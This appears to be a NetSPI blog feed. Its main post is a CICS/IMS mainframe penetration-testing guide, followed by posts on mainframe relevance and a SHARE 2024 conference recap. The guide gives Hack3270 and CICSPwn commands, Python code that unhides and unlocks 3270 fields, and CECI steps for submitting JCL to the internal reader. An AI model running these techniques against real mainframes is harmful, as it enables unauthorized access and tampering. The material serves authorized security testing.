Michelle Eggers, Author at NetSPI

Hacking CICS: 7 Ways to Defeat Mainframe Applications
https://www.netspi.com/blog/technical-blog/mainframe-penetration-testing/hacking-cics-applications/
Thu, 24 Oct 2024 14:22:00 +0000

Explore how modern penetration testing tools uncover vulnerabilities in mainframe applications, highlighting the need for methodical techniques and regular testing to protect these critical systems from threats.

The post Hacking CICS: 7 Ways to Defeat Mainframe Applications appeared first on NetSPI.

In recent years, penetration testing of CICS and IMS applications has advanced considerably. Open-source tool development and rising demand for mainframe security assessments have raised both the appetite for mainframe pentesting and the capabilities available to do it. In this post, we cover 7 ways to test your mainframe applications for vulnerabilities that are commonly seen in the wild. 

It is estimated that over 90% of mainframes in use today implement CICS for transaction management and it is more critical than ever for practitioners to invest in the security of these trusted environments.

What is Customer Information Control System (CICS)? 

The Customer Information Control System, commonly known as CICS, is a transaction processing system originally developed by IBM in 1968 to overcome a limitation of traditional batch processing: many online tasks needing access to the same resources (datasets, programs, terminals, and so on) at the same time. CICS has evolved over time to find prolific use in modern banking, insurance, retail, government, and other critical industries.  

Key features of CICS 

  • Deployed on z/OS and z/VSE to provide an environment for transaction management 
  • A middleware-like mixed-language application server that is often referred to as a region  
  • Handles communications between user interfaces (e.g., 3270 terminals or web interfaces) and backend resources such as Db2 databases, SOAP and REST services, and the external security manager (e.g., RACF) that authenticates users and authorizes transactions 
  • Processes large volumes of online transactions* rapidly and with high reliability. 

In summary, CICS is responsible for managing real-time transactions on mainframes. 

* A CICS transaction is a unit of processing initiated by a single request that may affect one or more objects 

What is Information Management System (IMS)?

IMS (Information Management System) is a hierarchical database and transaction management system for mainframes. Also developed by IBM, IMS is widely used in finance, telecommunications, and retail industries for high-volume transaction processing and data management. 

Two primary components 

  • The IMS DB (Database Manager) is a structured, non-relational database management system. It is optimized for fast access to large volumes of data, making it suitable for high-throughput environments.
  • IMS TM (Transaction Manager) is used to control execution of transactions. It facilitates concurrent and reliable processing of real-time transactions in a queue-based system and handles communication between end users and applications accessing IMS DB. 

In short, IMS is a hierarchical database and real-time transaction processing solution for mainframes. 

Let’s now take a look at the following vulnerabilities within CICS and IMS applications and explore the accompanying tools and methods that may be used to discover them. All examples are based on real-world findings identified in NetSPI-conducted penetration tests.  

  1. Unencrypted Transmission of Data
  2. Insecure Password Policies
  3. Hidden Fields Exploitation
  4. Protected Fields Manipulation
  5. Access To Administrative Transactions
  6. Unauthenticated Access to Transactions
  7. Remote Code Execution

1. Unencrypted Transmission of Data 

Weakness 

If the LPAR hosting the CICS region exposes its terminal and file-transfer services over unencrypted protocols, everything a user sends, including sign-on credentials and transaction data, can be read or altered by an attacker positioned on the network path (an attacker-in-the-middle). The plaintext services most often seen on mainframes are FTP on port 21 and Telnet on port 23 carrying TN3270. Their TLS-wrapped counterparts are conventionally found on 990 (FTPS) and 992 (TN3270 over TLS), but any of these services may be bound to a non-standard port, so the protocol actually in use, not the port number, is what must be verified.

Test 

To investigate, run a basic Nmap service scan against the CICS host to determine whether plaintext services are listening.

If the scan reports Telnet on port 23 and FTP on port 21 with no TLS-protected alternative, the region is reachable over protocols that transmit credentials and screen data in plaintext; anyone who can intercept the traffic can read it directly. Confirm the finding by checking whether the TN3270 listener actually negotiates TLS rather than relying on the port number alone.
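Port numbers only hint at the protocol. As an added example (my illustration, not code from the NetSPI post or from Nmap), the Python below reads the first bytes a listener sends and classifies them: TN3270 and Telnet servers open with IAC option negotiation, FTP with a 220 greeting, and a TLS listener stays silent until it receives a ClientHello, so a silent port is retried with a TLS handshake. It uses only the standard library; the host and ports are whatever you are testing, and the banners mentioned in the usage note are constructed.

```python
"""Check whether a mainframe listener talks in the clear.  Added example for
this post; not code from NetSPI or Nmap.  classify_banner() is a pure function
over the first bytes a server sends; probe() performs the live check."""
import socket
import ssl
import sys

IAC, DO, WILL = 0xFF, 0xFD, 0xFB                  # Telnet command bytes (RFC 854)
TERMINAL_TYPE, EOR, TN3270E = 0x18, 0x19, 0x28    # options a TN3270 server negotiates


def classify_banner(banner: bytes) -> str:
    """Classify what a listener said first.  Telnet/TN3270 servers open with
    IAC DO/WILL option negotiation, FTP with a '220' greeting, and a TLS
    listener says nothing until the client sends a ClientHello."""
    if banner.startswith(bytes([IAC])):
        opts = {banner[i + 2] for i in range(len(banner) - 2)
                if banner[i] == IAC and banner[i + 1] in (DO, WILL)}
        # EOR (RFC 1576) and TN3270E (RFC 2355) are not used by ordinary Telnet
        if opts & {EOR, TN3270E}:
            return "tn3270-plaintext"
        return "telnet-plaintext"
    if banner.startswith(b"220"):
        return "ftp-plaintext"
    if not banner:
        return "silent"
    return "unknown"


def probe(host: str, port: int, timeout: float = 5.0) -> str:
    """Read the greeting in the clear; if the listener is silent, reconnect and
    attempt a TLS handshake.  TN3270 over TLS is conventionally on 992 and
    FTPS on 990, but the port number proves nothing: only the protocol does."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            banner = s.recv(256)
        except socket.timeout:
            banner = b""
    verdict = classify_banner(banner)
    if verdict != "silent":
        return verdict
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE   # we only ask whether TLS is offered, not whether the cert is valid
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw, \
                ctx.wrap_socket(raw, server_hostname=host) as tls:
            return f"tls ({tls.version()})"
    except (ssl.SSLError, OSError):
        return "silent-no-tls"


if __name__ == "__main__":            # usage: probe.py HOST [PORT ...]
    host, *ports = sys.argv[1:]
    for p in ports or ["21", "23", "990", "992"]:
        print(f"{host}:{p:<5} {probe(host, int(p))}")
```

Against constructed banners, `b"\xff\xfd\x28"` (IAC DO TN3270E) classifies as tn3270-plaintext, `b"\xff\xfd\x18"` (IAC DO TERMINAL-TYPE only) as telnet-plaintext, and a `220` greeting as ftp-plaintext; any "-plaintext" verdict on a port carrying sign-on traffic is the finding described in this section, whatever the port number.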

2. Insecure Password Policies

Weakness 

When authentication to CICS applications requires only a low level of password complexity, brute-forcing valid passwords becomes a realistic threat. 

Test 

Investigate password policies by checking for sufficient complexity, or by modifying what is submitted during authentication to test whether validation is adequately strict. 

  1. Connect to the appropriate CICS or IMS region for the test. 
  2. At the logon prompt, input a valid password but with the wrong case. For example, if the password is Netspi27, submit nETSPI27.
  3. If the session logs on successfully, passwords are case-insensitive: the system is upper-casing the password before comparing it, which on RACF-protected systems usually means mixed-case passwords (SETROPTS PASSWORD(MIXEDCASE)) have not been enabled. 

Weak passwords arise in situations like the one above, in which mixed-case submissions are not validated, and in policies that allow passwords of fewer than 8 characters. Case-insensitivity alone cuts the keyspace of an 8-character alphanumeric password from 62^8 to 36^8, and when weak passwords are found alongside user enumeration (via differences in error messages or other means), the time needed to brute-force entire credential sets drops dramatically. 

3. Hidden Fields Exploitation  

Weakness  

Hidden (non-display) fields in a 3270 screen are hidden only by an attribute byte the host sends to the emulator; the emulator, not the host, decides not to render them. Open-source tools such as Hack3270 sit between the emulator and the host and can flip that attribute, so any value an application places in a hidden field is disclosed to the user and, if the field is also unprotected, can be modified to tamper with transactions or records. 

Test  

Utilize Hack3270 (https://github.com/gglessner/hack3270) to examine various CICS screens to see if additional functionality or information might be discovered. 

  1. Connect to your test IP with a mainframe emulator, such as x3270. 
  2. Launch the Hack3270 tool with the following command:
./hack3270.py [IP] [port] -t -d 
  3. A proxy listener will be established on port 3271. Connect to the proxy with x3270 and select “Click to Continue.” (The original post shows x3270 screenshots of the connection pending, connected, and after submitting “Click to Continue.”)
  4. Complete any required authentication steps.
  5. Navigate to various transactions within the application, toggling the Hack Fields button between OFF and ON to see whether hidden fields appear.

In the engagement shown in the original post, this uncovered an editable field that grants transaction permissions. The scenario illustrates how it may be possible to unhide fields that were designed to permit specific authorized actions within the context of a mainframe application transaction screen, and why an authorization decision must never depend on a field the user is not supposed to see. 

4. Protected Fields Manipulation 

Weakness 

In addition to hidden fields, locked (protected) fields within CICS screens may also be vulnerable to data or transaction tampering. The protected attribute is likewise just a bit in the field attribute byte sent to the emulator, so a proxy can clear it and make the field writable; the host will accept whatever comes back unless it checks authorization on its own side. 

Test 

  1. Follow steps 1-5 in the above example. 
  2. Locate a transaction that is disallowed for the authenticated user.
  3. With Hack Fields toggled to ON, note that the previously locked field becomes editable. In the original post's example, this was the Delete Order History transaction.
  4. Submit the transaction. If it completes successfully, the application is vulnerable to manipulation of protected fields.

When locked fields are relied upon as a security control, verifying whether they can be bypassed with modern tooling is essential; the only reliable control is an authorization check performed by the application or the external security manager when the transaction is received.  
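Both tests above work because the 3270 data stream carries the protection and visibility of every field as attribute bits that only the emulator honours. The following Python, an added example rather than code from the post, Hack3270 or x3270, parses a constructed Erase/Write stream (the screen layout, field names and values are invented), lists each field's protected and non-display bits, and rewrites them the way a proxy would; re-parsing the rewritten stream shows the hidden AUTH LEVEL value and the unlocked action field. The orders, attribute bits and buffer-address encoding are IBM's 3270 data stream rules.

```python
"""3270 data-stream field inspector: an added example, not code from NetSPI,
Hack3270 or x3270.  sample_screen() is a constructed screen; the orders,
attribute bits and address encoding are IBM's 3270 data stream rules."""
from dataclasses import dataclass

# 6-bit value -> the byte sent on the wire for buffer addresses and attributes
CODE_TABLE = [
    0x40, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7, 0xC8, 0xC9, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F,
    0x50, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7, 0xD8, 0xD9, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F,
    0x60, 0x61, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7, 0xE8, 0xE9, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F,
    0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7, 0xF8, 0xF9, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F,
]
SBA, SF, SFE, IC = 0x11, 0x1D, 0x29, 0x13           # orders handled here
OTHER_ORDERS = {0x05, 0x08, 0x12, 0x28, 0x2C, 0x3C}   # PT, GE, EUA, SA, MF, RA: rejected
PROTECTED, AUTOSKIP, DISPLAY_BITS, NONDISPLAY, INTENSIFIED = 0x20, 0x30, 0x0C, 0x0C, 0x08


@dataclass
class Field:
    row: int             # position of the attribute byte; the data starts one column right
    col: int
    attr: int            # 6-bit field attribute exactly as the host sent it
    text: str = ""
    protected = property(lambda self: bool(self.attr & PROTECTED))
    hidden = property(lambda self: (self.attr & DISPLAY_BITS) == NONDISPLAY)  # password-style


def decode_addr(b1: int, b2: int) -> int:
    if (b1 & 0xC0) == 0:                              # 14-bit addressing
        return ((b1 & 0x3F) << 8) | b2
    return ((b1 & 0x3F) << 6) | (b2 & 0x3F)           # 12-bit addressing


def encode_addr(addr: int) -> bytes:
    return bytes([CODE_TABLE[(addr >> 6) & 0x3F], CODE_TABLE[addr & 0x3F]])


def _tokens(stream: bytes):
    """Yield (offset, order or None, length) for everything after command + WCC."""
    i = 2
    while i < len(stream):
        b = stream[i]
        if b in OTHER_ORDERS:
            raise ValueError(f"unsupported 3270 order 0x{b:02X} at offset {i}")
        n = 2 + 2 * stream[i + 1] if b == SFE else {SBA: 3, SF: 2}.get(b, 1)
        yield i, (b if b in (SBA, SF, SFE, IC) else None), n
        i += n


def parse_screen(stream: bytes, cols: int = 80) -> list[Field]:
    """Walk a Write / Erase-Write stream and return its fields with their text."""
    fields, addr, cur = [], 0, None
    for i, order, n in _tokens(stream):
        if order == SBA:
            addr = decode_addr(stream[i + 1], stream[i + 2])
            continue                                  # moves the position, occupies no cell
        if order in (SF, SFE):
            attr = (stream[i + 1] & 0x3F) if order == SF else 0
            for k in range(i + 2, i + n, 2):          # SFE pairs; type 0xC0 = basic attribute
                if stream[k] == 0xC0:
                    attr = stream[k + 1] & 0x3F
            cur = Field(addr // cols, addr % cols, attr)
            fields.append(cur)
        elif order is None and cur is not None and stream[i]:   # 0x00 nulls carry no text
            cur.text += bytes([stream[i]]).decode("cp037")
        if order != IC:
            addr += 1
    return fields


def expose_fields(stream: bytes) -> bytes:
    """Copy with every field unprotected and visible (hidden ones come back
    intensified so they stand out).  A 3270 proxy does exactly this rewrite
    between host and emulator; the host never notices, so it must authorise."""
    out = bytearray(stream)
    for i, order, n in _tokens(stream):
        if order == SF:
            slots = [i + 1]
        elif order == SFE:
            slots = [k + 1 for k in range(i + 2, i + n, 2) if stream[k] == 0xC0]
        else:
            continue
        for k in slots:
            attr = out[k] & 0x3F & ~PROTECTED
            if (attr & DISPLAY_BITS) == NONDISPLAY:
                attr = (attr & ~DISPLAY_BITS) | INTENSIFIED
            out[k] = CODE_TABLE[attr]
    return bytes(out)


def sample_screen() -> bytes:
    """Constructed Erase/Write stream: a sign-on area plus a hidden, protected
    authorisation flag and a locked action field (invented layout)."""
    e = lambda s: s.encode("cp037")                    # noqa: E731
    sba = lambda row, col: bytes([SBA]) + encode_addr(row * 80 + col)
    sf = lambda attr: bytes([SF, CODE_TABLE[attr]])
    stop = sf(AUTOSKIP)                                # 0xF0: protected autoskip field delimiter
    return (bytes([0xF5, 0xC3])                        # Erase/Write command, WCC
            + sba(0, 0) + sf(PROTECTED) + e("ORDER MAINTENANCE")
            + sba(2, 0) + sf(PROTECTED) + e("USERID  :") + sba(2, 10) + sf(0) + bytes(8) + stop
            + sba(3, 0) + sf(PROTECTED) + e("PASSWORD:") + sba(3, 10) + sf(NONDISPLAY) + bytes(8) + stop
            + sba(5, 0) + sf(PROTECTED) + e("AUTH LEVEL:") + sba(5, 12) + sf(PROTECTED | NONDISPLAY) + e("ADMIN=N") + stop
            + sba(7, 0) + sf(PROTECTED) + e("DELETE ORDER HISTORY (Y/N):") + sba(7, 28) + sf(PROTECTED) + e("N") + stop
            + sba(2, 11) + bytes([IC]))
```

`parse_screen(sample_screen())` reports the AUTH LEVEL field at row 5 as protected and hidden with the text ADMIN=N, and the Delete Order History answer at row 7 as protected; after `expose_fields()` the same parser finds no protected or hidden fields at all while every text value is unchanged, which is precisely the view a user gets through a field-rewriting proxy. Any decision the application makes based on what those fields contain when the screen comes back has to be re-validated on the host.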

5. Access To Administrative Transactions 

Weakness 

Users should be granted access only to the transactions their role requires. Administrative transactions such as CEMT would allow an attacker to profile an entire CICS region and potentially disable transactions used for critical business functions. In CICS this is enforced by transaction-attach security (SIT parameters SEC=YES and XTRAN=YES) together with the matching transaction profiles in the external security manager (RACF classes TCICSTRN and GCICSTRN); if those are absent or too permissive, any signed-on user can run them.  

Test 

  1. Authenticate to the application as a lower-privileged user
  2. Clear the screen
  3. Input the transaction codes as seen below to determine whether a regular user is able to access or perform transactions that should require higher permission levels. 

Examples 

CICS:  

  • CEMT INQ TRAN to display all transactions 
  • CECI START TRANSID('tranname') to issue an EXEC CICS command (here, starting a transaction) from the command-level interpreter and display the result 

IMS:  

  • /DIS DB [dbname] to display the status of a database 
  • /DIS TRAN [tranname] to display the status of a transaction  

If these transactions run for low-level users, access controls may need to be reassessed and reconfigured more appropriately for improved security. 

6. Unauthenticated Access to Transactions 

Weakness 

Access to CICS transactions should require authentication. However, if access controls are misconfigured, for example when the region's default user (the identity CICS uses before anyone signs on) has been granted more than the sign-on transaction, some bypasses may be possible, resulting in completely unauthenticated transaction processing. 

Test 

Exit the authentication workflow at various stages of the process. Once exited, test whether it is possible to submit CICS or IMS commands without authenticating. 

  1. Connect to the IP and port for the test. Input the appropriate command (e.g., DIMS) to reach the authentication screen.
  2. Press PF2, or whichever key the application assigns, to exit the logon screen before completing authentication. Use the on-screen keyboard in the emulator or your physical keyboard, depending on how the region has been accessed. 
  3. Once the logon process has been terminated, attempt to enter a CICS or IMS transaction ID (e.g., CECI) and press Enter. 

If any CICS or IMS transactions run at this point, authentication controls have been bypassed: whatever ran did so under the region's default user. 

7. Remote Code Execution  

Weakness 

As mentioned earlier, CECI is the CICS command-level interpreter transaction. It is supplied with every CICS region and is frequently left enabled, but it should be disabled, or at least restricted to a small set of developers, in production. CECI can issue any EXEC CICS API command, including SPOOLOPEN, which opens a spool file on the JES internal reader and therefore allows job submission (the region's system spooling interface, SIT parameter SPOOL=YES, must be enabled for this to work). A user with only limited access to CICS can use it to submit JCL and from there obtain a reverse shell. 

Test 

  1. Connect to the CICS region. If presented with a CESN logon screen, press F3 to exit.
  2. Enter CECI on the screen.
  3. Using the SPOOLWRITE and variable features of CECI, submit JCL. Open the spool file to the internal reader with the following CECI command: 
    CECI SPOOLOPEN OUTPUT USERID('INTRDR  ') NODE('LOCAL') TOKEN(&TOKTEST)
  4. Create a variable in CECI holding one 80-column JCL card and use the command below to write the JCL to the internal reader, one line at a time (the job is not released to JES until the spool file is closed with SPOOLCLOSE TOKEN(...) or the task ends): 
    SPOOLWRITE TOKEN('TOKEN') FROM(&SQLKHDS) FLENGTH(80)
  5. When the job runs, it does so at the permission level of the CICS default user. 
  6. This can be automated with CICSPwn as a single command: python cicspwn.py -a APPLID -s custom --jcl /tmp/temp.jcl HOST/IP PORT 

This bypass grants an unauthenticated user the ability to submit JCL to the internal reader, which opens the door to many further compromises. Reverse shells on the mainframe could be established through this attack, potentially handing total control of mainframe resources to an anonymous user. 
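A tester assembling the SPOOLWRITE step by hand, or preparing the file handed to CICSPwn's --jcl option, needs the JCL as fixed 80-byte EBCDIC card images, which is what FLENGTH(80) refers to. The Python below is an added example (not code from the post or from CICSPwn) that validates and converts JCL text into those cards and lists the CECI command sequence in the shape the post shows, with SPOOLCLOSE at the end because that is the CICS API call that releases the spool file to JES. The job is a constructed IEFBR14 no-op, the sensible first submission to confirm that jobs reach JES before anything else is tried; the job name, accounting field and CECI variable names (&TOK, &CARD) are placeholders.

```python
"""Prepare a job for the SPOOLWRITE ... FLENGTH(80) step of the post: JCL is
written to the internal reader as fixed 80-byte EBCDIC card images.  Added
example, not code from NetSPI or CICSPwn.  The job is a constructed IEFBR14
no-op used to confirm that jobs reach JES at all; the job name, accounting
field and the CECI variable names are placeholders."""
from typing import Optional

CARD_LEN = 80
JCL_LAST_CODE_COL = 71     # JCL must end by column 71; columns 73-80 hold sequence numbers

SAMPLE_JCL = """\
//PENTEST1 JOB (ACCT),'ROUTE CHECK',CLASS=A,MSGCLASS=X
//STEP1    EXEC PGM=IEFBR14
//"""


def jcl_to_cards(jcl: str) -> list[bytes]:
    """Validate each statement and pad it to an 80-byte EBCDIC (cp037) card."""
    cards = []
    for n, line in enumerate(jcl.splitlines(), 1):
        if not line.startswith("//"):
            raise ValueError(f"line {n}: JCL statements begin with //")
        if "\t" in line:
            raise ValueError(f"line {n}: tabs are not valid in JCL")
        if len(line) > JCL_LAST_CODE_COL:
            raise ValueError(f"line {n}: {len(line)} chars; JCL must end by column {JCL_LAST_CODE_COL}")
        cards.append(line.ljust(CARD_LEN).encode("cp037"))
    if not cards or " JOB " not in cards[0].decode("cp037"):
        raise ValueError("first card must be the JOB statement")
    return cards


def ceci_steps(cards: list[bytes], token_var: str = "&TOK",
               card_var: str = "&CARD") -> list[tuple[str, Optional[bytes]]]:
    """CECI commands in the shape the post shows: SPOOLOPEN, one SPOOLWRITE per
    card (paired with the card bytes to load into the CECI variable first),
    then SPOOLCLOSE, which is what releases the spool file to JES."""
    steps = [(f"SPOOLOPEN OUTPUT USERID('INTRDR  ') NODE('LOCAL') TOKEN({token_var})", None)]
    for card in cards:
        steps.append((f"SPOOLWRITE TOKEN({token_var}) FROM({card_var}) FLENGTH({CARD_LEN})", card))
    steps.append((f"SPOOLCLOSE TOKEN({token_var})", None))
    return steps


if __name__ == "__main__":
    for cmd, payload in ceci_steps(jcl_to_cards(SAMPLE_JCL)):
        if payload is not None:
            print(f"  [&CARD <- {payload.decode('cp037').rstrip()!r}]")
        print(cmd)
```

Every card comes back as exactly 80 bytes with `//` encoded as EBCDIC 0x61 0x61, lines that run past column 71 or do not start with `//` are rejected before anything is sent, and the emitted sequence ends with SPOOLCLOSE; if the job never appears in JES after the SPOOLWRITE loop, a missing close or SPOOL=NO in the SIT are the first two things to check.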

Conclusion 

Though CICS and IMS applications have been in use for many years, new penetration testing tools and methodologies are still uncovering previously unknown weaknesses in mainframe environments. From simple access control issues to total mainframe compromise, the range of potential threats to mainframes is as varied as that found against any other system or network.

Methodical techniques, frequent testing, and thorough reviews of controls from a creative mindset are all ways to help protect the attack-surface landscape of these critical systems.

For additional support, follow our technical updates on the NetSPI Hack Responsibly blog, review presentations given by our team at various events including DEFCON, BSides, SHARE, and others (Phil Young/Soldier of FORTRAN, David Bryan/VideoMan, Michelle Eggers), and keep an eye out for new open-source tooling that can assist in your mainframe testing activities.  

To learn more about NetSPI Mainframe Pentesting, please visit: https://www.netspi.com/netspi-ptaas/network-penetration-testing/mainframe/ 

CICS Pentesting Resources 

  • Hack3270 – Tool used to unhide fields, unlock fields, submit keypresses, and log activity 
  • Damn Vulnerable CICS Application – Test environment to explore vulnerabilities 
  • CICSPwn – Pentesting tool used for reconnaissance, automation, and exploitation 


Mission for Mainframe | Part 1: Relevant Today
https://www.netspi.com/blog/executive-blog/mainframe-penetration-testing/mission-for-mainframe/
Tue, 18 Jun 2024 17:12:05 +0000

Learn from Michelle Eggers why mainframes are so important as the backbone that keeps our financial systems and other critical industries running.

The post Mission for Mainframe | Part 1: Relevant Today appeared first on NetSPI.

I used my debit card today, tapped the NFC area on the payment terminal and waited for my latte. An unremarkable situation, but there is so much at stake in the transmission of this data, and very powerful machines working at incredible speeds making it all possible.

The average latte-enjoyer is not typically going to consider the hops a payment request will make as it travels from tap to bank. It was my personal delight to discover that the most crucial transaction processing technology, capable of handling up to 1 trillion web transactions daily, is mainframes.

The first iteration was created for the US Navy Bureau of Ships in 1937, with commercialization taking place in 1951 under the Eckert-Mauchly Computer Corporation, and the first modern IBM System/360 reaching the market in 1965. In 1970 we saw magnetic ferrite cores replaced by silicon memory chips, but by 1991 as other technologies accelerated, the end of the mainframe era was predicted to occur only a few short years later.

We are now two decades beyond the expiration date given to mainframe computers, yet the financial industry is still largely held up by these servers, as well as government agencies, healthcare organizations, and other institutions with mission-critical systems requiring high reliability.

Entities like the NYSE or NASDAQ stock exchange must have no more than 5.26 minutes of downtime per year to avoid the impact of negative economic consequences, equating to what we call five nines of availability. This level of reliability is something only mainframe can provide.

Why Mainframe 

It is understood that mainframe computers are still in use today, but how are they different from other transaction-focused machines? Mainframes are relied upon for exemplary performance in three primary areas: reliability, availability, and serviceability (RAS).  

Reliability and Availability 

Mainframes are built tough! A recent 4.8 magnitude earthquake in New York state shook a corporate campus housing over 200 mainframes, none of which were affected by the groundbreaking event. Mainframe boxes are built to handle shock and vibrations, and may even include seismic isolation systems around the mainframes to protect them further. In fact, IBM implements standard testing that simulates the rough shaking a magnitude seven earthquake would produce.

Within a mainframe computer, built-in redundancy is another major benefit that can be found at various hardware levels, including processors, memory, power supplies, and I/O paths. As an example, the IBM z15 features up to 190 configurable cores across all processors. This contrasts with externally hosted storage and processing solutions, such as a distributed cloud environment like Amazon’s Aurora, wherein the redundancy occurs across multiple locations instead of natively within a single dedicated physical device.  

To prevent downtime, mainframes employ error detection and correction such as error-correcting code (ECC) memory, which detects and corrects data corruption. Mainframes have long been adept at virtualization for efficient hardware utilization and process isolation, and now incorporate comprehensive system management tools that continuously monitor performance to predict failures. These monitoring tools can also initiate preventive measures, such as automatically switching workloads to backup systems, for additional assurance of reliability. 

Even the software running on these computers is specifically engineered for high reliability. Able to support things like transaction rollback, checkpoint restart, and complex job scheduling, mainframe systems maintain operation in adverse conditions that would otherwise knock competing options down.  

Serviceability 

It may seem that mainframes would be more complex to maintain than smaller systems, but there are actually some great ease-of-use features supported.  

Mainframe computers are modular by design, so repairs and upgrades are less complicated and time consuming. Individual components (processors, disk drives, memory cards) can be swapped out with no impact to the overall system. This is huge when we remember the downtime limitations of certain industries being about five minutes maximum per year; repair time counts as downtime when it impacts the ability to complete required tasks. 

Modern systems are also equipped with thorough logging that can be used to support advanced diagnostic tools, and remote management access is available for updates and troubleshooting at will. A mainframe box hosted on-site also means access to physical repairs or updates is owned wholly by the organization employing the machine, a solid benefit to those requiring tightly controlled access to their business-critical systems.

Something to consider regarding serviceability with mainframe computers, however, is the specialized nature of the technology. Though they are not so far removed from other transaction-focused servers, there is a known mainframe practitioner shortage. This is a result of many organizations assuming mainframes would be fully sunset by the mid-1990s, effectively causing a reduction in funding for new hires and training programs. Though some organizations are now working to address this gap, businesses that employ mainframes for mission-critical processes would be wise to enlist the support of the greater mainframe security community to help ensure all bases are covered and defense-in-depth is being achieved.

What’s Next  

The Artificial Intelligence revolution has been underway for several years now and is advancing rapidly — and the continued expansion and maturation of cloud-based business solutions for storage and processing show no indication of slowing. These technologies among others could be viewed as threats to mainframe, but the reality is no solution exists able to replace mainframe computers that is as private, as powerful, or as trustworthy. It is more likely we will see hybridization of cloud and mainframe environments, with native AI enhancements in place for use-cases like advanced fraud detection.

Modern mainframes incorporate crypto, network, and compression cards all with their own processors and memory. Integrated encryption for data at rest and in motion is standard for mainframes, a feature other servers simply do not have. Mainframes are not frozen in time either, with new innovations for native AI inferencing built into the processor cores themselves and further potential to host virtual private cloud environments or proprietary LLMs, there is a healthy future in store for mainframes. 

Beginning with a basic purchase, your payment transaction data traveled from the vendor eventually to a mainframe, and from there made it back to your bank records. Perhaps the next time you tap for a latte, you’ll consider the backbone infrastructure making your debit card worth more than the thin rectangle of plastic it consists of, meaningless without the machines transmitting and processing some of your most sensitive data across time and space. 


Mainframe Mania: Highlights from SHARE Orlando 2024
https://www.netspi.com/blog/executive-blog/personnel-development/highlights-from-share-orlando-2024/
Tue, 26 Mar 2024 13:00:00 +0000

NetSPI Security Consultant Michelle Eggers attended SHARE Orlando 2024 for a hands-on educational conference focused on mainframe security.

The post Mainframe Mania: Highlights from SHARE Orlando 2024  appeared first on NetSPI.

SHARE Orlando 2024

Mainframe is happening now!

While most people may imagine mainframe computers to be an antiquated world of massive machinery, tape spools, and limited possibilities, they actually receive widespread use today in 2024 as the backbone infrastructure that allows billions of financial transactions to occur daily on a global scale.

Government entities can store and retrieve sensitive data with extremely high reliability and almost nonexistent downtime, and other sectors like healthcare, insurance, and utilities can meet the speed of demand by processing multiple terabytes of data with incredible ease, and consistency.

Mainframe computers have a wonderfully rich history that spans decades, and as such there have been many groups over the years that bring practitioners, vendors, and resource owners together for collaboration. SHARE, with an inauguration year of 1955, is the oldest and most well-known of these organizations — if you work in mainframe, you know about SHARE! It began as the first IT Enterprise group ever to form within the United States and has been operating continuously since, through industry publications, annual conferences, trainings, and ongoing opportunities to connect.

I had the pleasure of attending this year’s SHARE Orlando 2024 where I learned about the state of mainframe security today and the in-demand skills needed to protect these critical systems. Here’s what I thought of my time at the event.

Mainframe Penetration Testing is a Scarce Skillset 

SHARE Orlando 2024 was the first time I had the opportunity to experience a mainframe event, and it was an excellent introduction to the mainframe community at large with representation from organizations worldwide occupying the mainframe space. NetSPI was the only US-based proactive security consulting firm present, and I found myself engaged in multiple conversations on mainframe security as it relates to new integrations with data lakes, analytics platform, blockchain, and AI.

Also under frequent discussion were developments in hosted cloud computing, quantum cryptography, web applications on mainframe, and mainframe ethical hacking in general. I realized during my time at SHARE that there are currently very few dedicated ethical hackers working in mainframe; the arena is in great need of this skillset, and I was deeply encouraged to continue building my individual mainframe knowledge while contributing to the development of our expanding Mainframe Penetration Testing service line here at NetSPI.

IBM z/OS is by far the most common operating system you will find in use on mainframe today, and I was intrigued by a product IBM recently released called WatsonX AI. It makes use of foundational models and generative AI to assist with code translation from COBOL to Java for increased interoperability, and also makes it possible for businesses to train and deploy custom AI capabilities across the enterprise environment while maintaining full control of the data they own.

I also learned so much at both talks given by Philip Young, NetSPI’s Mainframe Director. At his first talk, entitled “Hacking CICS Applications: New Attacks on Old Screens”, the collaborative nature of SHARE was seen in full force as he was met with a great deal of feedback from the audience throughout the duration of the presentation. The talk covered an introduction to hack3270, a tool used to assist in CICS application pentesting, and certainly made an impression on the crowd… especially vendors and developers who had some new things to consider regarding the security of their CICS environments.

Philip’s second talk, “No Longer a Myth: A Guide to Mainframe Buffer Overflows”, was also well-received by the audience. A specific attack that for years many believed to be impossible was brought to light with a clear demo on how exactly this vulnerability can take place and some tips on ways to safeguard against buffer overflows on mainframe.

Finally, Mark Wilson gave a talk on the threat of ransomware within the mainframe environment. It was eye-opening for me, as I personally was not aware of the native capability mainframe has for encrypting massive amounts of stored data within mere seconds. The fact that terabytes of mission-critical data could be encrypted in less than 12 minutes was a strong call to action for mainframe practitioners and owners alike to be aggressive with MFA requirements and tracking user behavior analytics.

Mainframe Security Is Mission-Critical 

I have a soft spot for mission-critical operations, legacy systems, and critical infrastructure. More specifically, I have a deep and abiding passion for the security of systems like mainframe that are heavily relied upon that do not frequently gain mainstream attention in the cybersecurity space. If we are relying on these computers, we must continuously work to protect them! Though they have been around for many years, new integrations and developments mean we will be faced with new potential vulnerabilities. All an attacker needs is one weakness to prevail, and these are the situations I am here to identify and report for eradication.

Check Out These Free Resources to Expand Your Mainframe Security Education 

There are some great talks available online, Philip has a fantastic list up (here and here are a few) covering many topics from the hacker perspective. IBM also hosts a free training program called IBM Z Xplore with hands-on interactive modules for learning to navigate and maximize z/OS use, as well as a networking platform called New to Z for burgeoning talent within any organization utilizing mainframe technology.

Overall, the experience at SHARE is a must-attend for those involved with or even just deeply fascinated by the world of mainframe. There is no other gathering of people with such passion and drive dedicated to this field. I was very pleased with the new information I was able to acquire and am so thankful for the connections I made among professionals and peers within the mainframe community.

See NetSPI’s technical research on Mainframe Penetration Testing by reading Philip’s article on Enumerating Users on z/OS with LISTUSER.


Q&A with Michelle Eggers: An Inside Look at the SANS ICS Security Summit 2023
